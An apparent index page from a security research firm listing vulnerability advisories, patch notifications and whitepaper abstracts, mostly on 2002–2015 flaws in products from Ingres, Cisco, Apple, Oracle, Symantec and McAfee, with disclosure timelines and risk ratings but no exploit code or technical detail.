Release Date: 25 June 2007
Reference: NGS00392
Discoverer: Chris Anley <chris@ngssoftware.com>
Vendor: Ingres
Vendor Reference: [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Systems Affected: Ingres 2006 9.0.4 and prior
Risk: Critical
Status: Published
TimeLine
Discovered: 29 March 2006
Released: 29 March 2006
Approved: 29 March 2006
Reported: 29 March 2006
Fixed: 21 June 2007
Published: 25 June 2007…


Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)

Summary
Name: Ingres remote unauthenticated pointer overwrite 1
Release Date: 25 June 2007
Reference: NGS00391
Discoverer: Chris Anley <chris@ngssoftware.com>
Vendor: Ingres
Vendor Reference: Ingres bug 115927, CVE-2007-3336, CAID 35450
Systems Affected: Ingres 2006 9.0.4 and prior
Risk: Critical
Status: Published
TimeLine
Discovered: 29 March 2006
Released: 29 March 2006
Approved: 29 March 2006
Reported: 29 March 2006
Fixed: 21 June 2007
Published: 25 June 2007…


Cisco VPN Client Privilege Escalation

Summary – 28.06.2011
Name: Cisco VPN Client Privilege Escalation
Reference: NGS00051
Discoverer: Gavin Jones
Vendor: Cisco
Vendor Reference:
Systems Affected: Cisco VPN client (Windows 64 Bit)
Risk: High
Status: Fixed
TimeLine
Discovered: 15 February 2011
Released: 15 February 2011
Approved: 15 February 2011
Reported: 22 February 2011
Fixed: 24 March 2011
Published: 28 June 2011
Description
The 64 Bit Cisco VPN Client…


Cisco IPSec VPN Implementation Group Name Enumeration

Summary – 22.03.2011
Name: Cisco IPSec VPN Implementation Group Name Enumeration
Reference: NGS00014
Discoverer: Gavin Jones
Vendor: Cisco
Vendor Reference: CSCei51783, CSCtj96108
Systems Affected: ASA 5500 Series Adaptive Security Appliances; Cisco PIX 500 Series Security Appliances; Cisco VPN 3000 Series Concentrators (models 3005, 3015, 3020, 3030, 3060, and 3080)
Risk: Low
Status: Published
TimeLine
Discovered: 20…


Blue Coat BCAAA Remote Code Execution Vulnerability

Summary – 05.07.2011
Name: Blue Coat BCAAA Remote Code Execution Vulnerability
Release Date: 5 July 2011
Reference: NGS00060
Discoverer: Paul Harrington
Vendor: Blue Coat Systems Inc
Vendor Reference: 2-358686722
Systems Affected: All versions of BCAAA associated with ProxySG releases 4.2.3, 4.3, 5.2, 5.3, 5.4, 5.5, and 6.1 available prior to April 21, 2011 or with a build…


BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter

Vulnerability Summary
Title: BlackBerry Link Installs A WebDAV Server Which Does not Require Authentication to Access
Release Date: 12 November 2013
Reference: NCC00622
Discoverer: Ollie Whitehouse
Vendor: BlackBerry (formerly Research In Motion)
Vendor Reference: BSRT-2013-012
Systems Affected: Microsoft Windows, Mac OS X
CVE Reference: CVE-2013-3694
CVSS: 6.8
Risk: High
Status: Published


Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE

Summary
Name: Bit51 Better WP Security Plugin – Unauthenticated Stored XSS to RCE
Release Date: 30 July 2013
Reference: NGS00500
Discoverer: Richard Warren <richard.warren@nccgroup.com>
Vendor: Bit51
Vendor Reference:
Systems Affected: Bit51 Better WP Security Plugin Version 3.4.8/3.4.9/3.4.10/3.5.2/3.5.3
Risk: High
Status: Published
TimeLine
Discovered: 1 April 2013
Released: 1 April 2013
Approved: 1 April 2013
Reported: 1 April 2013
Fixed: 21 July 2013
Published:…


Back Office Web Administration Authentication Bypass

NGSSoftware Insight Security Research Advisory
Name: Back Office Web Administration Authentication Bypass
Systems Affected: Microsoft’s Back Office Web Administrator 4.0, 4.5
Severity: Medium/High
Vendor URL: http://www.microsoft.com
Author: David Litchfield (david@ngssoftware.com)
Date: 17th April 2002
Advisory number: #NISR17042002A
Advisory URL: http://www.ngssoftware.com/advisories/boa.txt
Issue: Attackers can bypass the logon page and access the…


AtHoc Toolbar

Mark Litchfield and John Heasman of NGSSoftware have discovered two high-risk vulnerabilities in the AtHoc Toolbar. The AtHoc toolbar is a plugin for Microsoft’s Internet Explorer. The toolbar is redistributed to users of eBay, Accenture, ThomasRegister, ThomasRegional, Juniper Networks, WiredNews, CarFax and Agile PLM. The flaws, which include a remotely exploitable buffer overflow and a format string bug, have been…


ASE 12.5.1 datatype overflow

NGSSoftware Insight Security Research Advisory
Name: Sybase ASE convert overflow
Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower
Severity: High
Vendor URL: http://www.sybase.com
Author: Sherief Hammad [ sherief@ngssoftware.com ]
Date of Technical Advisory: 25th June 2004
Details
There is an exploitable stack overflow in the Sybase…


Archived Technical Advisories

Look at our old advisories! Adobe Acrobat Reader XML Forms Data Format Buffer Overflow; ASE 1251 Datatype Overflow; Athoc Toolbar; Back Office Web Administration Authentication Bypass; Critical Vulnerability In Snmpc; Critical Risk Vulnerability In Ingres Pointer Overwrite 1; Critical Risk Vulnerability In Ingres Pointer Overwrite 2; Critical Risk Vulnerability In…


Apple QuickTime Player m4a Processing Buffer Overflow

Vulnerability Summary
Title: Apple QuickTime Player m4a Processing Buffer Overflow
Release Date: 23 October 2014
Reference: NGS00677
Discoverer: Karl Smith
Vendor: Apple
Vendor Reference: 16247108
Systems Affected: Windows 7, XP
CVE Reference: CVE-2014-4351
Risk: High
Status: Fixed
Resolution Timeline
Discovered: 3 March 2014
Reported: 6 March 2014
Released: 6 March 2014
Fixed: 16 October 2014
Published: 23 October 2014
Vulnerability Description
QuickTime player on OS X and Windows…


Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow

Summary – 10.10.2011
Name: Apple OSX / iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
Reference: NGS00062
Discoverer: Dominic Chell
Vendor: Apple
Vendor Reference: 145575681
Systems Affected: Apple OSX / iPhone iOS / Possibly others using LibTiff
Risk: High
Status: Fixed
TimeLine
Discovered: 27 February 2011
Released: 27 February 2011
Approved: 29 March 2011
Reported: 29 March 2011
Fixed: 23 June 2011
Published:…


Apple Mac OS X ImageIO TIFF Integer Overflow

Summary – 28.06.2011
Name: Apple Mac OS X ImageIO TIFF Integer Overflow
Reference: NGS00057
Discoverer: Dominic Chell <dominic.chell@ngssecure.com>
Vendor: Apple
Vendor Reference: 142522746
Systems Affected: Mac OS X v10.6 through v10.6.6, Mac OS X Server v10.6 through v10.6.6. This issue does not affect systems prior to Mac OS X v10.6
Risk: High
Status: Published
TimeLine
Discovered: 8…


Apple CoreAnimation Heap Overflow

Title: Apple CoreAnimation Heap Overflow
Release Date: 3 March 2014
Reference: NGS00550
Discoverer: Karl Smith
Vendor: Apple
Vendor Reference: 15229587
Systems Affected: OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
CVE Reference: CVE-2014-1258
Risk: High
Status: Fixed
Download our technical advisory


Writing Small Shellcode

When exploiting vulnerabilities in compiled software we are often constrained by the amount of data that can be used; it is therefore important that shellcode is as small as possible. In this paper the author will describe his attempt to write Win32 shellcode that is as small as possible, in…


Writing Secure ASP Scripts

This paper will address some of the common classes of coding error that can be encountered when auditing web applications running on the Active Server Pages (ASP) platform. Firstly the paper will provide a list of common coding problems to be discussed, followed by a discussion of the three main…


Windows 2000 Format String Vulnerabilities

This paper, by David Litchfield, will discuss Format String Vulnerabilities on the Windows 2000 Operating System. Download Whitepaper


The Pentesters Guide to Akamai

This paper summarises the findings of NCC Group’s research into Akamai and provides advice to companies who wish to gain maximum security from their Akamai solutions on how to achieve this. Akamai allows organisations to improve performance and decrease the load on a web-based service through distributed networks of servers to perform…


Adobe flash sandbox bypass to navigate to local drives

Title: Adobe flash sandbox bypass to navigate to local drives
Release Date: 12 August 2014
Reference: NGS00711
Discoverer: Soroush Dalili
Vendor: Adobe
Vendor Reference: PSIRT-2823
Systems Affected: Flash Player 14.0.0.125 (tested with IE 11)
CVE Reference: CVE-2014-0541
Risk: Medium
Status: Fixed
Download our technical advisory


Adobe Flash Player Cross Domain Policy Bypass

Vulnerability Summary
Title: Adobe Flash Player Cross Domain Policy Bypass
Release Date: 13 March 2015
Reference: NCC00761
Discoverer: Soroush Dalili
Vendor: …


Adobe Acrobat Reader XML Forms Data Format Buffer Overflow

NGSSoftware Insight Security Research Advisory
Name: Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
Systems Affected: Adobe Acrobat Reader version 5.1
Severity: High Risk
Vendor URL: http://www.adobe.com/
Author: David Litchfield [ david@ngssoftware.com ]
Date Vendor Notified: 7th February 2004
Date of Public Advisory: 3rd March 2004
Advisory number: #NISR03022004
Advisory URL: http://www.ngssoftware.com/advisories/adobexfdf.txt
Description
Adobe Acrobat Reader is a…


Modelling Threat Actor Phishing Behaviour

“You’re only as strong as your weakest link!” This whitepaper focuses on the reconnaissance phase of a simulated attack. It will discuss how likely targets are identified within an organisation and why certain individuals are chosen. The reconnaissance phase will typically involve open source intelligence…


Research Insights Volume 7: Exploitation Advancements

In the next of the Research Insights series we have looked at the exploitation techniques used by cyber criminals in their attempt to gain access to your critical business information. As exploits become more sophisticated, attacks of the previous era are now no longer…


The Demise of Signature Based Antivirus

There has been some debate on the importance of antivirus software over the past few years. Some see antivirus as a way to satisfy risk controls and form part of an organisation’s information security strategy, and insist on antivirus being installed on all of an organisation’s machines. However, this demand for antivirus has…


Stopping Automated Attack Tools

There are a huge number of automated attack tools available that can spider and mirror application content, extract confidential material, discover code injection flaws, fuzz application variables for exploitable overflows, scan for common files or vulnerable CGIs and generally attack or exploit web-based application flaws. These tools are very useful…


Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond

This white paper outlines a set of practical and pragmatic security considerations for organisations designing, developing and testing Internet of Things (IoT) devices and solutions. The purpose of this white paper is to provide practical advice for consideration as part of the product development lifecycle. While IoT products by their…


Security Best Practice: Host Naming & URL Conventions

This paper will demonstrate how the implementation of a well-thought-out host naming and URL referencing convention can provide a sizable contribution to an organisation’s defence-in-depth posture. Host and URL naming conventions are an issue that is often overlooked by organisations when they are developing web applications, but poorly…


Securing PL/SQL Applications with DBMS_ASSERT

Over the past few years Oracle has fixed a large number of PL/SQL injection vulnerabilities in their database server product. To help combat this class of attack Oracle has introduced the DBMS_ASSERT PL/SQL package. As a security researcher, it is excellent to see Oracle finally making the right positive moves…


Second-Order Code Injection Attacks

A second-order code injection attack is the process where malicious code is injected into a web-based application and not immediately executed but is stored by the application to be retrieved, rendered and executed by the victim later. In this paper we will further explain second-order code injection attacks, providing examples…


Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013

Embedded systems have become a part of our day to day lives and examples of these can be seen everywhere from TVs to aircraft, printers to weapon control systems, but as a security researcher it is often difficult to know how to begin when testing one of these black boxes.…


Research Insights Volume 4 – Sector Focus: Maritime Sector

The fourth edition of our ‘Research Insights’ series delves into the risks faced in the Maritime Industry as a result of the increasingly connected world that we live in. Cyber security weaknesses in the maritime industry include insufficiently maintained and protected software, problems with legacy communication systems and the widespread…


Research Insights Volume 2 – Defensive Trends

This paper is the second in a series of Research Insights from our world class research team. It looks at some of the most recent trends in information security defence, such as cloud computing, mobile apps, mobile devices and security information management systems. Download whitepaper The next in the series…


Research Insights Volume 1 – Sector Focus: Financial Services

This whitepaper forms the first in a series of research insights from NCC Group. It delves into the financial services sector to provide an overview of some of the threats the sector is currently facing. This is a series of papers from NCC Group, the next two papers in the…


Quantum Cryptography – A Study Into Present Technologies and Future Applications

The first quantum cryptographic exchange occurred in October 1989 at IBM’s Thomas J. Watson Research Centre near New York. Two computers called Alice and Bob successfully negotiated a completely secure channel of communication over a distance of 32 centimetres, making quantum cryptography a reality rather than just a theory. In…


Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)

This whitepaper is about PCI DSS v3.0 Requirement 3.4 – the requirement to protect cardholder data on disk/at rest. There are a number of compliant options available, with varying levels of security in different scenarios. This document is intended as an analysis of the various compliant options such that the…


Preparing for Cyber Battleships – Electronic Chart Display and Information System Security

In an increasingly connected world, cyber security is more important than ever. NCC Group, one of the world’s leading cyber security research companies, regularly investigates the susceptibility of non-traditional systems to attack in order to help raise awareness of the risks to these systems. In this paper, we discuss the…


Passive Information Gathering – The Analysis of Leaked Network Security Information

Most organisations are aware of and are protecting themselves against the threat posed by an attacker gaining access to systems through the exploitation of security vulnerabilities within the organisation’s systems. However, far less attention is paid to the potential threat that information unintentionally leaked and freely available over the internet can pose to an organisation. This…


Oracle Passwords and OraBrute

This paper will discuss the weakness of Oracle passwords and how they are implemented with reference to a number of current security issues. Lastly this paper will introduce a tool to exploit this weakness in Oracle’s most privileged account. Download whitepaper


Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations

This paper is the final in a series of papers exploring Oracle forensics by David Litchfield. In this paper David will be examining the internals of the Oracle System Change Number (SCN) in 10g and show how it can be useful in forensic investigations. The paper will also show how orablock and…


Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin

This paper is the 6th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. This paper will look at the ways a forensics examiner can search for evidence of an attack in the places and technologies designed by Oracle for disaster recovery processes. Download whitepaper


Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing

This paper is the 5th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment David will be discussing forensic analysis of a compromised database server. When investigating other areas of computer forensics it is often obvious that a crime has been committed, however…


Oracle Forensics Part 4: Live Response

This paper is the 4th in a series of papers covering Oracle forensics. In this paper David Litchfield will cover reactions to a security incident occurring. For many organisations without a plan of action in the event of a security incident, the instinctive response is to disconnect the system from the network…


Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism

This paper is the 3rd in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment David will be looking at ways to understand if a breach has been successful. The paper will start by exploring attacks against the authentication mechanism and evidence from the…


Oracle Forensics Part 2: Locating Dropped Objects

This second paper in the Oracle Forensics series will show that, even when an object has been dropped and purged from the system, there will be, in the vast majority of cases, fragments left “lying around” which can be sewn together to build an accurate picture of what the actions the…


Oracle Forensics Part 1: Dissecting the Redo Logs

This paper is the 1st in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this 1st paper David will explain how the redo logs can be a rich source of evidence for a forensic examiner when they are investigating a compromised Oracle database server. Whenever a…


Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP

As the number of products providing protection against buffer overflow exploits on the stack grows, non-stack based overflow exploits will become more and more common. In this paper we will start by explaining the differences between a stack-based overflow and a non-stack based overflow, then explain how to write a…


New Attack Vectors and a Vulnerability Dissection of MS03-007

On the 17th of March 2003 Microsoft announced a patch to fix a security vulnerability at the centre of the Windows 2000 operating system. In this paper we will discuss a number of new attack vectors that we have discovered on the same operating system, including java based web servers…


More Advanced SQL Injection

This paper covers topics from the author’s previous paper “Advanced SQL Injection”, expanding upon and clarifying ideas from the previous paper. It will describe a method for privilege escalation using the openrowset function to scan a network, a method for extracting information in the absence of an error message and…


Microsoft’s SQL Server vs. Oracle’s RDBMS

This paper will be exploring the security postures of Microsoft’s SQL Server and Oracle’s RDBMS and examining the differences between the two systems based upon flaws reported by external security researchers. Download whitepaper


Microsoft SQL Server Passwords

It is widely known that SQL Server uses an undocumented function, pwdencrypt(), to produce a hash of the user’s password, which is stored in the sysxlogins table of the master database. However, what has not been discussed are the details of the pwdencrypt() function. This paper will cover the pwdencrypt function…


Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel

Due to their relatively low cost, small size and ease of distribution, smart cards have become a popular choice for security when designing a system. They are often regarded as tamper-proof devices where data can be physically protected, but this is not the case and it should be remembered…


Lessons learned from 50 bugs: Common USB driver vulnerabilities

Over the past few years NCC Group has identified over 50 USB driver bugs. Using this research, along with information from his 2011 paper “USB – Undermining Security Barriers”, Andy Davis will in this paper outline common USB vulnerabilities and how to identify them. The paper will firstly discuss the…


Inter-Protocol Exploitation

Inter-Protocol Exploitation is an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a different application which uses a different protocol entirely. This paper will expand upon previous research into Inter-Protocol Exploitation and will show the…


Inter-Protocol Communication

Research into web browser security has acted as a catalyst for more in-depth research into Inter-Protocol Communication, an attack vector that potentially allows arbitrary protocols to meaningfully interact with each other. In the past, it has been assumed that communication between different protocols is invalid and of no consequence; this paper will…


Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities

Over the past few years there has been a shift in the pattern of security vulnerabilities and an increase in the volume of zero-day (0day) exploits, which is making traditional security strategies less effective. Although traditional techniques such as penetration testing and vulnerability scanning are still an essential part of a company’s security…


Implementing and Detecting a PCI Rootkit

This paper will build upon the author’s previous research presented in February 2006 that explored a way of persisting a rootkit in the system BIOS via the Advanced Configuration and Power Interface (ACPI). This paper will discuss means of persisting a rootkit on a PCI device containing a flashable expansion…


How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit

Penetration test reports commonly contain mention of vulnerabilities in SSL/TLS (hereafter referred to as just SSL). In many cases, this is due to system administrators not understanding the details of these services’ configuration and assuming that simply using SSL provides security. The issues identified during penetration tests are usually low…


Hackproofing Oracle Application Server

Although Oracle 9 was proven not to be Unbreakable as their marketing campaign claimed, the product had passed fourteen independent security evaluations, demonstrating Oracle’s commitment to producing a secure product. In this paper we aim to bring Oracle customers to the secure environment they were promised by examining the ways…


Hackproofing MySQL

MySQL is one of the most popular open source databases, and compared to some database management systems it is relatively easy to configure. However there are still a wide variety of configuration issues that need to be addressed to ensure the system is secure. This paper will provide an outline…


Hackproofing Lotus Domino Web Server

This paper will show Lotus Domino administrators ways in which an attacker would attempt to subvert the security of a Domino web server and provide insight into the mind of a Domino hacker. Throughout the paper the attacks will be explained in detail and will include information on how to…


Hacking Appliances: Ironic exploits in security products

The paper will review research conducted in 2012 into the overall security posture of popular appliance-based security products, building on research carried out in 2011 by NCC Group. The research focused on the most recent versions of widely used appliances from popular vendors in the IT Security industry covering: Firewalls…


Fuzzing USB devices using Frisbee Lite

This paper will discuss the format of device requests that are sent to USB devices in order to hopefully provide an insight into areas where software flaws may exist. It will also discuss a number of public vulnerabilities in USB devices and finally, the installation and usage of Frisbee Lite.…


HDMI – Hacking Displays Made Interesting

Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…


Exploiting Security Gateways Via Web Interfaces

The security of security software is often taken for granted, and people assume that as it has been developed by a company that knows security it is likely to be secure. However, with regard to Security Gateway UIs this is an incorrect assumption; the developers who design, code and test the UI…


Research Insights Volume 5 – Sector Focus: Automotive

The modern vehicle has become increasingly computerised, and with that has come an increased risk of cyber threats. While it has been known for some time in the vehicle modification and security industries that electronic vehicle systems contain exploitable vulnerabilities, it is only recently that academics, government, vehicle manufacturers, and the cyber security research community…


The why behind web application penetration test prerequisites

Before a web application penetration test is scheduled to start, the company performing the test will contact the client with a set of prerequisites; that is, a list of considerations and configurations that are required before the test can begin. However, the…


Cyber red-teaming business-critical systems while managing operational risk

Cyber red-teaming allows mature organisations to gauge their true resilience to sophisticated, planned, and somewhat sustained cyber-attack. These organisations use red team engagements to assess multiple facets of their cyber security strategy, maturity and implementation. With the introduction of programmes such as…


USB attacks need physical access right? Not any more…

Historically USB bugs have required physical access so that a rogue device can be inserted into the target system to trigger a vulnerability by supplying malicious data, often within a USB protocol descriptor. This paper provides step-by-step instructions, showing how to remotely trigger a Windows-based USB bug by using a…


Threat Profiling Microsoft SQL Server

In this paper we will write from the perspective of an attacker targeting the Microsoft SQL Server. The paper will cover: setting up for an attack; attacks that do not require authentication; and attacks that require authentication.


Image IO Memory Corruption

This patch notification details a high risk vulnerability in Mac OS X Image Raw, this vulnerability was discovered by Paul Harrington.  Download patch notification


Thin Clients: Slim Security

The advent of thin client, diskless PCs appears to offer IT Managers a cheap and effective solution to the problem of managing a large estate of desktop PCs and the associated security risks, making thin clients an attractive solution. However, research for this paper has revealed that these devices can…


The Phishing Guide: Understanding & Preventing Phishing Attacks

Phishing started off being part of popular hacking culture, but quickly professional criminals began using phishing techniques to steal personal finances and conduct identity theft at a global level. As phishing attacks become more widespread and more sophisticated it is important that we understand the tools and techniques used. This…


Impress Pages CMS Remote Code Execution

This patch notification details a high risk vulnerability, discovered by David Middlehurst, in ImpressPages CMS v1.0.12.  Download patch notification


Lumension Device Control Remote Memory Corruption

This patch notification details a high risk vulnerability, discovered by Andy Davis, in Lumension Device Control. Download patch notification


McAfee Email and Web Security Appliance Active session tokens of other users are disclosed within the UI

This patch notification details a medium risk vulnerability that has been discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification


McAfee Email and Web Security Appliance Any logged-in user can bypass controls to reset passwords of other administrators

This patch notification details a high risk vulnerability discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification


Bypassing Oracle DBMS_ASSERT (in certain situations)

Oracle Security Specialist Alex Kornbrust demonstrated that there are certain cases where the DBMS_ASSERT.QUALIFIED_SQL_NAME function can be unintentionally misused by developers so that SQL injection is still possible, and showed a way to break out of a quoted string to inject arbitrary SQL. This paper will explore another…


McAfee Email and Web Security Appliance Arbitrary file download is possible with a crafted URL, when logged in as any user

This patch notification details a medium risk vulnerability discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification


McAfee Email and Web Security Appliance Password hashes can be recovered from a system backup and easily cracked

This patch notification details a medium risk vulnerability that has been discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification


McAfee Email and Web Security Appliance Reflective XSS allowing an attacker to gain session tokens

This patch notification details a high risk vulnerability in the McAfee Email and Web Security Appliance, discovered by Ben Williams.  Download patch notification


McAfee Email and Web Security Appliance Session hijacking and bypassing client-side session timeouts

This patch notification details a medium risk vulnerability in the McAfee Email and Web Security Appliance, discovered by Ben Williams.  Download patch notification


Medium Risk Vulnerability in Symantec Enterprise Security Management

This patch notification details a medium risk vulnerability discovered by Gavin Jones in Symantec Enterprise Security Management 9.0.1 Agent (version 9.0.1153.20001). Download patch notification


Medium Risk Vulnerability in Symantec Network Access Control

This patch notification details a medium risk vulnerability discovered by Gavin Jones in Symantec Endpoint Protection Version 12.1.1000.157.105.  Download patch notification


Nagios XI Network Monitor Stored and Reflected XSS

This patch notification details a high risk vulnerability discovered by Daniel Compton in Nagios XI Network Monitor.  Download patch notification


NX Server for Linux Arbitrary Files can be read with root privileges

This patch notification details a high risk vulnerability, discovered by NGS Secure, in NoMachine NX Server for Linux 3.5.0-4 (Advanced and Enterprise, across Red Hat and Debian hosts). Download patch notification


Oracle 11g TNS listener remote Invalid Pointer Read

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle database 11g. Download patch notification


Oracle 11g TNS listener remote Null Pointer Dereference

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle database 11g. Download patch notification


Oracle Retail Integration Bus Manager Directory Traversal

This patch notification details a high risk vulnerability in Oracle Retail Integration Bus Manager, discovered by Andy Davis. Download patch notification


Oracle Retail Invoice Manager SQL Injection

This patch notification covers a high risk vulnerability discovered by Andy Davis within Oracle Retail Central Office. Download patch notification


OS X Lion USB Hub Class Descriptor Arbitrary Code Execution

This patch notification details a high risk vulnerability discovered by Andy Davis in Apple OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4. Download patch notification


PRTG Network Monitor Command injection

This patch notification details a high risk vulnerability, discovered by Daniel Compton, in PRTG Network Monitor.  Download patch notification


Samba Andx Request Remote Code Execution

This patch notification details a high risk vulnerability in the Samba service, discovered by Andy Davis.  Download patch notification


Samba on the BlackBerry PlayBook

This patch notification details a high risk vulnerability that has been discovered by Andy Davis in the Samba service running on the Blackberry Playbook.  Download patch notification


Solaris 11 USB hubclass

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle Solaris. Download patch notification


Symantec Message Filter Session Hijacking via session

This patch notification details a high risk vulnerability in Symantec Message Filter, discovered by Ben Williams. Download patch notification


Symantec Message Filter Unauthenticated verbose software version information disclosure

This patch notification details a low risk vulnerability in Symantec Message Filter, discovered by Ben Williams. Download patch notification


Symantec Messaging Gateway – Addition of a backdoor administrator via CSRF

This patch notification details a high risk vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification


Symantec Messaging Gateway – Authenticated arbitrary file download

This patch notification details a medium risk vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification


Symantec Messaging Gateway – Out of band stored XSS via email

This patch notification details a critical vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification


Symantec Messaging Gateway – Unauthenticated detailed version disclosure

This patch notification details a critical vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification


Symantec Messaging Gateway – Unauthorised SSH access

This patch notification details a high risk vulnerability in Symantec Messaging Gateway, discovered by Ben Williams. Download patch notification


Symantec PC Anywhere Remote Code Execution

This patch notification details a critical vulnerability, discovered by Edward Torkington, in Symantec PCAnywhere.  Download patch notification


Assuring Your DDoS Defences

Distributed Denial of Service (DDoS) attacks first appeared on the internet in 2000; since then they have increased in frequency and size and become a serious threat to an organisation’s security. During a DDoS attack thousands of botnet-controlled hosts will flood an organisation’s servers with more requests than they can handle,…


Black Hat Europe 2013 Andy Davis: To dock or not to dock…

This paper will explore the issue of laptop docking stations being used as attack platforms as well as explaining a few simple techniques that can be used to mitigate the risks.  Laptop docking stations are attractive to organisations with semi-mobile workers as they enable users to connect their laptops to…


BlackBerry PlayBook Security – Part Two – BlackBerry Bridge

This paper is the second in a series discussing the security of the BlackBerry PlayBook, and will focus on the security of the BlackBerry Bridge. The BlackBerry Bridge allows its users to connect their PlayBook to the BlackBerry phone and use applications on the tablet through the phone and for…


BlackBerry PlayBook Security – Part One

This paper forms the first in a series of papers on the security of the first tablet device from Research in Motion (RIM), the BlackBerry PlayBook. This paper aims to give an overview of the security of the BlackBerry PlayBook; a breadth-first approach was taken to uncover as many…


Automated enumeration of email filtering solutions

This whitepaper summarises research undertaken in 2013/14 to develop offensive reconnaissance techniques for automated and external enumeration of the email filtering solutions of target organisations. It shows how methodology, automated scripts, and test message sets can be used to enumerate a target email filtering solution, quickly and to a high…


Attacking the Windows Kernel (Black Hat Las Vegas 2007)

This paper is focused on Windows and the Intel Architecture, and will briefly outline the current supervisor boundaries provided. Different attack vectors, along with relevant examples, will be provided to demonstrate how to attack the supervisor from the perspective of the supervised. Download whitepaper


Oracle Gridengine sgepasswd Buffer Overflow

Summary
Name: Oracle Gridengine sgepasswd Buffer Overflow
Release Date: 30 November 2012
Reference: NGS00107
Discoverer: Edward Torkington <edward.torkington@ngssecure.com>
Vendor: Oracle
Vendor Reference:
Systems Affected: Multiple packages – version 6_2u7
Risk: High
Status: Published

TimeLine
Discovered: 1 August 2011
Released: 1 August 2011
Approved: 1 August 2011
Reported: 3 August 2011
Fixed: 17 April 2012
Published: 30 November 2012

Description
http://www.oracle.com/us/products/tools/oracle-grid-engine-075549.html “Oracle Grid Engine…


Nagios XI Network Monitor – OS Command Injection

Summary
Name: Nagios XI Network Monitor – OS Command Injection
Release Date: 30 November 2012
Reference: NGS00196
Discoverer: Daniel Compton <daniel.compton@ngssecure.com>
Vendor: Nagios
Vendor Reference: 0000283
Systems Affected: Nagios XI Network Monitor 2011R1.9
Risk: High
Status: Published

TimeLine
Discovered: 30 January 2012
Released: 31 January 2012
Approved: 31 January 2012
Reported: 31 January 2012
Fixed: 23 May 2012
Published: 30 November 2012

Description…


Nagios XI Network Monitor Blind SQL Injection

Summary
Name: Nagios XI Network Monitor – Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00194
Discoverer: Daniel Compton <daniel.compton@ngssecure.com>
Vendor: Nagios
Vendor Reference: 0000282
Systems Affected: Nagios XI Network Monitor 2011R1.9
Risk: High
Status: Published

TimeLine
Discovered: 30 January 2012
Released: 31 January 2012
Approved: 31 January 2012
Reported: 31 January 2012
Fixed: 7 June 2012
Published: 30 November 2012

Description…


Assessing IIS Configuration Remotely

A good application security assessment should probe all levels of the environment as well as the custom application itself. In this paper we will examine the relatively unknown skills of assessing the in-depth configuration of a Microsoft IIS web server remotely, and we hope that we will also show the…


A Simple and Practical Approach to Input Validation

Input validation is the process of ensuring that the input into software conforms to what the internal logic of the software expects. Though it is a relatively simple problem to solve, it accounts for a high proportion of the security vulnerabilities discovered. Not only is more education needed on the security risks…


Application Layer Attacks – The New DDoS Battleground

DDoS attacks have been on the rise for a number of years, which has resulted in significant increases in the variety and availability of mitigation services designed to deal with such threats. With advancements in attack techniques comes the requirement for mitigation providers to adapt their detection and scrubbing methodologies. We…


Anti Brute Force Resource Metering

Web-based applications’ authentication processes are commonly vulnerable to automated brute force guessing attacks. Techniques such as escalating time delays and minimum lockout strategies are commonly implemented to solve the problem; however, in reality these techniques are not effective. This paper will explore an alternative solution, the enforcement of resource metering…


An Introduction to Heap overflows on AIX 5.3L

This paper, by David Litchfield, provides an introduction to heap overflows on AIX 5.3L. Download whitepaper


An Analysis of Mobile Geofencing App Security

Geofencing is the use of the global positioning system (GPS) to create a ‘virtual barrier’, enabling different functionality in an application or device depending on geographical area. In particular, many applications now exist to allow users to receive alerts should a mobile device leave or join a specified area. These…



Managing Cyber Risk in the Supply Chain

The intricate relationship between an organisation and its suppliers as they share information and access to business systems comes at a cost. In order to ensure the security and integrity of their suppliers, many organisations rely heavily upon a number of internal verification and audit processes that are expensive and…


Disclosure Policy

NCC Group believes that security research is performed to keep the users of technology safe from its weaknesses and informed of the risks they are taking through its use. Download the disclosure policy


OSX afpserver remote code execution

Vulnerability Summary
Title: OSX afpserver remote code execution
Release Date: 2 July 2015
Reference: NCC00836
Discoverer: Dean Jerkovich
Vendor: Apple
Vendor Reference: 2015-005
Systems Affected: OS X Yosemite
CVE Reference: CVE-2015-3674
Risk: High
Status: Published

Download technical advisory
